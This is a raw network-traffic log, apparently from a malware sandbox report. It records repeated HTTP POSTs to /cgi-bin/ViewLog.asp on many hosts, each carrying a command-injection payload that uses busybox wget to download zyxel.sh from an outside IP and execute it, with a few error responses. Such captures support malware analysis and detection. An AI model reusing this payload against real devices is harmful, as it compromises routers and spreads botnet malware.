                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:58.246910095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.726233959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.684370041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.144665631.136.170.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.729993105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.399701118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:40.743719101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.655478954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:49.031333923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.782809973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821866989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.828269005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.143864694.123.178.958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.755011082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.143905294.123.33.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.755733967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.144996894.46.181.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.483834028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.697608948 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:39 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.144417231.136.113.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.494343996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.631537914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.775262117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.806796074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:24.869834900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:14.019826889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.145848031.129.204.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.506354094 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.752885103 CET626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:33:39 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.144644831.136.108.98080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:39.536814928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:40.167699099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
